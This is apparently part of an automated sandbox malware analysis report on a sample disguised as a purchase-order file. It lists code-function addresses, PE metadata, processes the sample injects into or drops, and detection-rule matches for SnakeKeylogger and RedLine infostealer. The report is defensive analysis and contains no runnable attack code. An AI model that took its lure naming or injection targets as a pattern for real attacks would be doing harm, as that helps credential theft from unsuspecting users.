                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_05700E3E0_2_05700E3E
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_057037400_2_05703740
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_057037330_2_05703733
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_09AB00400_2_09AB0040
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_0B5028E80_2_0B5028E8
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_0B50AB400_2_0B50AB40
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_0B50AB300_2_0B50AB30
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_0B5028D80_2_0B5028D8
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_0B509E980_2_0B509E98
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_0B50BDCF0_2_0B50BDCF
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_0B50BDE00_2_0B50BDE0
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_0B50A2D00_2_0B50A2D0
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_0B50A2C00_2_0B50A2C0
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_0B5000400_2_0B500040
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_0B5000060_2_0B500006
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_0B50A7080_2_0B50A708
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_0F261F700_2_0F261F70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_004ABD1A9_2_004ABD1A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_004A87FC9_2_004A87FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_0055000C9_2_0055000C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_004182449_2_00418244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00418CCC9_2_00418CCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_004187889_2_00418788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_0041A4BE9_2_0041A4BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F482869_2_00F48286
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F730F09_2_00F730F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F46EAF9_2_00F46EAF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F47B719_2_00F47B71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F705D09_2_00F705D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F47F809_2_00F47F80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_070B0F109_2_070B0F10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_070B0F209_2_070B0F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_070B15B89_2_070B15B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_070B15C89_2_070B15C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_070B5C469_2_070B5C46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F1AFE89_2_09F1AFE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F139209_2_09F13920
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F139109_2_09F13910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F119189_2_09F11918
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F119089_2_09F11908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F12DD09_2_09F12DD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F12DC19_2_09F12DC1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F1DC089_2_09F1DC08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F11FF19_2_09F11FF1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F100409_2_09F10040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F120009_2_09F12000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F100069_2_09F10006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F1C2989_2_09F1C298
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F112309_2_09F11230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F112209_2_09F11220
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F137919_2_09F13791
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F137159_2_09F13715
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F126E89_2_09F126E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_09F126D89_2_09F126D8
                  Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B8A81015_2_00B8A810
                  Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B67C0015_2_00B67C00
                  Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B679F015_2_00B679F0
                  Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B92D4015_2_00B92D40
                  Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B8EEB015_2_00B8EEB0
                  Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B892A015_2_00B892A0
                  Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B893B015_2_00B893B0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 17_2_00427C0017_2_00427C00
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 17_2_0044A81017_2_0044A810
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 17_2_00452D4017_2_00452D40
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 17_2_004279F017_2_004279F0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 17_2_004492A017_2_004492A0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 17_2_0044EEB017_2_0044EEB0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 17_2_004493B017_2_004493B0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_0089CA2018_2_0089CA20
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_0089878918_2_00898789
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_008BA81018_2_008BA810
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_008979F018_2_008979F0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_008B92A018_2_008B92A0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_008B93B018_2_008B93B0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_00897C0018_2_00897C00
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_008C2D4018_2_008C2D40
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_008BEEB018_2_008BEEB0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00D3A81019_2_00D3A810
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00D17C0019_2_00D17C00
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00D179F019_2_00D179F0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00D42D4019_2_00D42D40
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00D3EEB019_2_00D3EEB0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00D392A019_2_00D392A0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00D393B019_2_00D393B0
                  Source: C:\Windows\System32\msdtc.exeCode function: 20_2_0057A81020_2_0057A810
                  Source: C:\Windows\System32\msdtc.exeCode function: 20_2_00557C0020_2_00557C00
                  Source: C:\Windows\System32\msdtc.exeCode function: 20_2_00582D4020_2_00582D40
                  Source: C:\Windows\System32\msdtc.exeCode function: 20_2_005579F020_2_005579F0
                  Source: C:\Windows\System32\msdtc.exeCode function: 20_2_0057EEB020_2_0057EEB0
                  Source: C:\Windows\System32\msdtc.exeCode function: 20_2_005792A020_2_005792A0
                  Source: C:\Windows\System32\msdtc.exeCode function: 20_2_005793B020_2_005793B0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B3A81021_2_00B3A810
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B17C0021_2_00B17C00
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B179F021_2_00B179F0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B42D4021_2_00B42D40
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B3EEB021_2_00B3EEB0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B392A021_2_00B392A0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B393B021_2_00B393B0
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_008622E422_2_008622E4
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_0086373022_2_00863730
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_0086374022_2_00863740
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_069309F822_2_069309F8
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08D4004022_2_08D40040
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08D42FC022_2_08D42FC0
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E328E822_2_08E328E8
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E328D822_2_08E328D8
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3AB4022_2_08E3AB40
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3AB3022_2_08E3AB30
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3BDE022_2_08E3BDE0
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3BDCF22_2_08E3BDCF
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E39E9822_2_08E39E98
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3004022_2_08E30040
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3003E22_2_08E3003E
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3A2C022_2_08E3A2C0
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3A2D022_2_08E3A2D0
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E355F822_2_08E355F8
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3A6F822_2_08E3A6F8
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3A70822_2_08E3A708
                  Source: C:\Windows\System32\Locator.exeCode function: 24_2_004C7C0024_2_004C7C00
                  Source: C:\Windows\System32\Locator.exeCode function: 24_2_004EA81024_2_004EA810
                  Source: C:\Windows\System32\Locator.exeCode function: 24_2_004F2D4024_2_004F2D40
                  Source: C:\Windows\System32\Locator.exeCode function: 24_2_004C79F024_2_004C79F0
                  Source: C:\Windows\System32\Locator.exeCode function: 24_2_004E92A024_2_004E92A0
                  Source: C:\Windows\System32\Locator.exeCode function: 24_2_004EEEB024_2_004EEEB0
                  Source: C:\Windows\System32\Locator.exeCode function: 24_2_004E93B024_2_004E93B0
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 25_2_006C7C0025_2_006C7C00
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 25_2_006EA81025_2_006EA810
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 25_2_006F2D4025_2_006F2D40
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 25_2_006C79F025_2_006C79F0
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 25_2_006E92A025_2_006E92A0
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 25_2_006EEEB025_2_006EEEB0
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 25_2_006E93B025_2_006E93B0
                  Source: C:\Windows\System32\snmptrap.exeCode function: 26_2_00687C0026_2_00687C00
                  Source: C:\Windows\System32\snmptrap.exeCode function: 26_2_006AA81026_2_006AA810
                  Source: C:\Windows\System32\snmptrap.exeCode function: 26_2_006B2D4026_2_006B2D40
                  Source: C:\Windows\System32\snmptrap.exeCode function: 26_2_006879F026_2_006879F0
                  Source: C:\Windows\System32\snmptrap.exeCode function: 26_2_006A92A026_2_006A92A0
                  Source: C:\Windows\System32\snmptrap.exeCode function: 26_2_006AEEB026_2_006AEEB0
                  Source: C:\Windows\System32\snmptrap.exeCode function: 26_2_006A93B026_2_006A93B0
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_0054A81027_2_0054A810
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_00527C0027_2_00527C00
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_00552D4027_2_00552D40
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_005279F027_2_005279F0
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_0054EEB027_2_0054EEB0
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_005492A027_2_005492A0
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_005493B027_2_005493B0
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_0050A81028_2_0050A810
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_004E7C0028_2_004E7C00
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_00512D4028_2_00512D40
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_004E79F028_2_004E79F0
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_0050EEB028_2_0050EEB0
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_005092A028_2_005092A0
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_005093B028_2_005093B0
                  Source: C:\Windows\System32\TieringEngineService.exeCode function: 30_2_007FA81030_2_007FA810
                  Source: C:\Windows\System32\TieringEngineService.exeCode function: 30_2_007D7C0030_2_007D7C00
                  Source: C:\Windows\System32\TieringEngineService.exeCode function: 30_2_007D79F030_2_007D79F0
                  Source: C:\Windows\System32\TieringEngineService.exeCode function: 30_2_00802D4030_2_00802D40
                  Source: C:\Windows\System32\TieringEngineService.exeCode function: 30_2_007FEEB030_2_007FEEB0
                  Source: C:\Windows\System32\TieringEngineService.exeCode function: 30_2_007F92A030_2_007F92A0
                  Source: C:\Windows\System32\TieringEngineService.exeCode function: 30_2_007F93B030_2_007F93B0
                  Source: C:\Windows\System32\AgentService.exeCode function: 31_2_00BEA81031_2_00BEA810
                  Source: C:\Windows\System32\AgentService.exeCode function: 31_2_00BC7C0031_2_00BC7C00
                  Source: C:\Windows\System32\AgentService.exeCode function: 31_2_00BC79F031_2_00BC79F0
                  Source: C:\Windows\System32\AgentService.exeCode function: 31_2_00BF2D4031_2_00BF2D40
                  Source: C:\Windows\System32\AgentService.exeCode function: 31_2_00BEEEB031_2_00BEEEB0
                  Source: C:\Windows\System32\AgentService.exeCode function: 31_2_00BE92A031_2_00BE92A0
                  Source: C:\Windows\System32\AgentService.exeCode function: 31_2_00BE93B031_2_00BE93B0
                  Source: C:\Windows\System32\vds.exeCode function: 33_2_00B9A81033_2_00B9A810
                  Source: C:\Windows\System32\vds.exeCode function: 33_2_00B77C0033_2_00B77C00
                  Source: C:\Windows\System32\vds.exeCode function: 33_2_00B779F033_2_00B779F0
                  Source: C:\Windows\System32\vds.exeCode function: 33_2_00BA2D4033_2_00BA2D40
                  Source: C:\Windows\System32\vds.exeCode function: 33_2_00B9EEB033_2_00B9EEB0
                  Source: C:\Windows\System32\vds.exeCode function: 33_2_00B992A033_2_00B992A0
                  Source: C:\Windows\System32\vds.exeCode function: 33_2_00B993B033_2_00B993B0
                  Source: C:\Windows\System32\wbengine.exeCode function: 35_2_00B1A81035_2_00B1A810
                  Source: C:\Windows\System32\wbengine.exeCode function: 35_2_00AF7C0035_2_00AF7C00
                  Source: C:\Windows\System32\wbengine.exeCode function: 35_2_00AF79F035_2_00AF79F0
                  Source: C:\Windows\System32\wbengine.exeCode function: 35_2_00B22D4035_2_00B22D40
                  Source: C:\Windows\System32\wbengine.exeCode function: 35_2_00B1EEB035_2_00B1EEB0
                  Source: C:\Windows\System32\wbengine.exeCode function: 35_2_00B192A035_2_00B192A0
                  Source: C:\Windows\System32\wbengine.exeCode function: 35_2_00B193B035_2_00B193B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_004028B042_2_004028B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00402B9042_2_00402B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_004073A042_2_004073A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00408C6042_2_00408C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_0040DC1142_2_0040DC11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00407C3F42_2_00407C3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00406CA042_2_00406CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_0040165042_2_00401650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00402F2042_2_00402F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00402F8942_2_00402F89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D151EE42_2_00D151EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D16EAF42_2_00D16EAF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D4598042_2_00D45980
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D539A342_2_00D539A3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D5515C42_2_00D5515C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D4D58042_2_00D4D580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D4C7F042_2_00D4C7F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D17F8042_2_00D17F80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D4378042_2_00D43780
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_074B0F1042_2_074B0F10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_074B0F2042_2_074B0F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_074B15C842_2_074B15C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_074B15B842_2_074B15B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_074B5C4642_2_074B5C46
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
                  Source: elevation_service.exe0.9.drStatic PE information: Number of sections : 12 > 10
                  Source: elevation_service.exe.9.drStatic PE information: Number of sections : 12 > 10
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1426195581.0000000005149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1426195581.0000000004A29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000000.1363270819.0000000000F7E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIJgI.exe4 vs RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1457423473.00000000081E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1465820251.000000000B90C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1417300663.000000000137E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeBinary or memory string: OriginalFilenameIJgI.exe4 vs RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 42.2.vbc.exe.7590f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.8745570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.7590000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.6272458.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 42.2.vbc.exe.8775190.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.8746478.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.8746478.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.8775190.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
